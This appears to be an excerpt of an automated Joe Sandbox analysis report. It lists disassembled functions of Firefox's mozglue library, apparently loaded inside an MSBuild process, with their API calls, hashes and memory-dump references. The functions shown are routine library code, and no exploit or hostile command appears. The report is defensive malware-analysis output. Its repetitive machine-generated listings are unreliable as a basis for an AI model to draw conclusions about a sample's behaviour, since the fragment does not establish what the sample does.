                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8DDE5F
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8DDEA3
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8DDEE9
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C8CDEFD,?,6C894A68), ref: 6C8DDF32
                                                                                                                                                                                                                        • Part of subcall function 6C8DDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C8DDB86
                                                                                                                                                                                                                        • Part of subcall function 6C8DDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C8DDC0E
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C8CDEFD,?,6C894A68), ref: 6C8DDF65
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8DDF80
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8A5EDB
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: memset.VCRUNTIME140(6C8E7765,000000E5,55CCCCCC), ref: 6C8A5F27
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8A5FB2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 112305417-0
                                                                                                                                                                                                                      • Opcode ID: 2a727cf1aa309576e65a6f8070f8df8b3b968290643ee1341919ee823da0167f
                                                                                                                                                                                                                      • Instruction ID: e41d52fa1c225f900196e5b130ed1bc0fa0ce027b90f44894d436b81c1ee95d2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a727cf1aa309576e65a6f8070f8df8b3b968290643ee1341919ee823da0167f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F51B7727017119BD7309B28DA806AEB372AF91318F974D2ED41A53B00D731F959CFA2
                                                                                                                                                                                                                      Function 6C8E5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C8E5C8C,?,6C8BE829), ref: 6C8E5D32
                                                                                                                                                                                                                      • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C8E5C8C,?,6C8BE829), ref: 6C8E5D62
                                                                                                                                                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C8E5C8C,?,6C8BE829), ref: 6C8E5D6D
                                                                                                                                                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C8E5C8C,?,6C8BE829), ref: 6C8E5D84
                                                                                                                                                                                                                      • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C8E5C8C,?,6C8BE829), ref: 6C8E5DA4
                                                                                                                                                                                                                      • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C8E5C8C,?,6C8BE829), ref: 6C8E5DC9
                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6C8E5DDB
                                                                                                                                                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C8E5C8C,?,6C8BE829), ref: 6C8E5E00
                                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C8E5C8C,?,6C8BE829), ref: 6C8E5E45
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2325513730-0
                                                                                                                                                                                                                      • Opcode ID: 9b55805ba846fd582c4d96990745b31b71f5c5e5de9fcd0ef64c3622c57c680f
                                                                                                                                                                                                                      • Instruction ID: 2add44828364593802afde78de540b9f0695430c94fb47ddf035fab46062cfce
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b55805ba846fd582c4d96990745b31b71f5c5e5de9fcd0ef64c3622c57c680f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC418E707043058FDB20DF69C998AAEB7B9EF8E355F14446CE50A9B781EB30E805CB61
                                                                                                                                                                                                                      Function 6C8BCC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C8831A7), ref: 6C8BCDDD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                      • API String ID: 4275171209-2186867486
                                                                                                                                                                                                                      • Opcode ID: dcc6f80ad5ba4bdcafc64502ade073a47d5d92d9acca50e05daca51b7a917a88
                                                                                                                                                                                                                      • Instruction ID: d65fdcfde1e02e5fad751308354fa4e4b14769ec0dec046790aefefc839698e6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dcc6f80ad5ba4bdcafc64502ade073a47d5d92d9acca50e05daca51b7a917a88
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D3183717452099BEF20AFA9CE45B6E7B75AB41B58F30481DF610FBB81DBB0D5008BA1
                                                                                                                                                                                                                      Function 6C88ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C88F100: LoadLibraryW.KERNEL32(shell32,?,6C8FD020), ref: 6C88F122
                                                                                                                                                                                                                        • Part of subcall function 6C88F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C88F132
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000012), ref: 6C88ED50
                                                                                                                                                                                                                      • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C88EDAC
                                                                                                                                                                                                                      • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C88EDCC
                                                                                                                                                                                                                      • CreateFileW.KERNEL32 ref: 6C88EE08
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C88EE27
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C88EE32
                                                                                                                                                                                                                        • Part of subcall function 6C88EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C88EBB5
                                                                                                                                                                                                                        • Part of subcall function 6C88EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C8BD7F3), ref: 6C88EBC3
                                                                                                                                                                                                                        • Part of subcall function 6C88EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C8BD7F3), ref: 6C88EBD6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C88EDC1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                                                                      • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                                                                      • API String ID: 1980384892-344433685
                                                                                                                                                                                                                      • Opcode ID: bbbeb68aeb8d06fe0d0f6f5545f56d5651f77427d724c6439ac359efbca17e3e
                                                                                                                                                                                                                      • Instruction ID: 1e153d291d00a35454cf18fe2ac416b438ae29703e90aa06b380966c62d8831a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbbeb68aeb8d06fe0d0f6f5545f56d5651f77427d724c6439ac359efbca17e3e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A51D575D063089BDB20DF6CCA406EEB7B0AF59318F448D2DE85567B41E730A988C7E2
                                                                                                                                                                                                                      Function 6C8FA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C8FA565
                                                                                                                                                                                                                        • Part of subcall function 6C8FA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8FA4BE
                                                                                                                                                                                                                        • Part of subcall function 6C8FA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C8FA4D6
                                                                                                                                                                                                                      • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C8FA65B
                                                                                                                                                                                                                      • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C8FA6B6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                                                                                                                                      • String ID: 0$z
                                                                                                                                                                                                                      • API String ID: 310210123-2584888582
                                                                                                                                                                                                                      • Opcode ID: ac1bc6d9dad557c458ab0797d268b132c1549e82a9ae73df9e6d0456f9ebe89c
                                                                                                                                                                                                                      • Instruction ID: 4338452cb4d9f1d3dbc0b777d34ec7e7154c56550ee58fccb97aa875fd071837
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac1bc6d9dad557c458ab0797d268b132c1549e82a9ae73df9e6d0456f9ebe89c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C4138719097459FC351DF28C180A9FBBE4BF89354F408E2EF4A987650EB34D949CB92
                                                                                                                                                                                                                      Function 6C8878C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • free.MOZGLUE(?,6C90008B), ref: 6C887B89
                                                                                                                                                                                                                      • free.MOZGLUE(?,6C90008B), ref: 6C887BAC
                                                                                                                                                                                                                        • Part of subcall function 6C8878C0: free.MOZGLUE(?,6C90008B), ref: 6C887BCF
                                                                                                                                                                                                                      • free.MOZGLUE(?,6C90008B), ref: 6C887BF2
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8A5EDB
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: memset.VCRUNTIME140(6C8E7765,000000E5,55CCCCCC), ref: 6C8A5F27
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8A5FB2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$CriticalSection$EnterLeavememset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3977402767-0
                                                                                                                                                                                                                      • Opcode ID: 97980ed9f3b4e6ddd481c1cf49b89cd8a082d2ac5272ac843a6ccd85498713ff
                                                                                                                                                                                                                      • Instruction ID: bbd7164f5e4bfa24c4a52a37e5131a6210650dbf09e8c274616a6ebc5748edb2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97980ed9f3b4e6ddd481c1cf49b89cd8a082d2ac5272ac843a6ccd85498713ff
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64C1B731F021288BEB34CB68CE90B9DB772AF41314F150BA9E51AA7FC5D7319E858B51
                                                                                                                                                                                                                      Function 6C8C9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C8C946B
                                                                                                                                                                                                                      • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C8C9459
                                                                                                                                                                                                                      • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C8C947D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                                                                      • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                                                                      • API String ID: 4042361484-1628757462
                                                                                                                                                                                                                      • Opcode ID: d88bb54a7c59d545311f4444dabbd48efb17c8922c4cbcf7e24b31c0a1cc4f4f
                                                                                                                                                                                                                      • Instruction ID: 2f1fa59a9fb2c031f9c7821fd2714d075f7f052b0e656aeeb52185b5ee294eb8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d88bb54a7c59d545311f4444dabbd48efb17c8922c4cbcf7e24b31c0a1cc4f4f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02014C30B0410087DF20DB5CDA04A8633B99B4672DF14493FDC0686B81D735D554C95F
                                                                                                                                                                                                                      Function 6C8D0F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D0F6B
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8D0F88
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D0FF7
                                                                                                                                                                                                                      • InitializeConditionVariable.KERNEL32(?), ref: 6C8D1067
                                                                                                                                                                                                                      • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C8D10A7
                                                                                                                                                                                                                      • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C8D114B
                                                                                                                                                                                                                        • Part of subcall function 6C8C8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C8E1563), ref: 6C8C8BD5
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8D1174
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8D1186
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2803333873-0
                                                                                                                                                                                                                      • Opcode ID: 14ee77028804c145c66abe0d947f7c632fd556faa3b4bb9c4a9476b1beb2ef8d
                                                                                                                                                                                                                      • Instruction ID: 0f5cf8aeea0a2b2482dc5cc28eddfcd66b373224d5d5a150f4d7424677b7714f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14ee77028804c145c66abe0d947f7c632fd556faa3b4bb9c4a9476b1beb2ef8d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F61AE756083449BDB20DF28CA8079AB7F5BFC5318F15892DE88947711EB31F989CB82
                                                                                                                                                                                                                      Function 6C88E9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?,?,?,6C891999), ref: 6C88EA39
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6C88EA5C
                                                                                                                                                                                                                      • memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6C88EA76
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(-00000001,?,?,6C891999), ref: 6C88EA9D
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6C891999), ref: 6C88EAC2
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6C88EADC
                                                                                                                                                                                                                      • free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6C88EB0B
                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6C88EB27
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 706364981-0
                                                                                                                                                                                                                      • Opcode ID: a739493401c4d42b28e2f24c1e62f2b6cc5eb9baa3d433dd69dc0843a0991116
                                                                                                                                                                                                                      • Instruction ID: bc7f52e688628f82d91aca62f969c440aaa67f606f19cde8e173c707327805a8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a739493401c4d42b28e2f24c1e62f2b6cc5eb9baa3d433dd69dc0843a0991116
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6341B4B1A012159FDB24CF68DD80AAE77B4FF55258F240A38E825E7B94E730DA0487D1
                                                                                                                                                                                                                      Function 6C88B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?,?,?,?,6C88B61E,?,?,?,?,?,00000000), ref: 6C88B6AC
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C88B61E,?,?,?,?,?,00000000), ref: 6C88B6D1
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C88B61E,?,?,?,?,?,00000000), ref: 6C88B6E3
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C88B61E,?,?,?,?,?,00000000), ref: 6C88B70B
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C88B61E,?,?,?,?,?,00000000), ref: 6C88B71D
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C88B61E), ref: 6C88B73F
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C88B61E,?,?,?,?,?,00000000), ref: 6C88B760
                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C88B61E,?,?,?,?,?,00000000), ref: 6C88B79A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
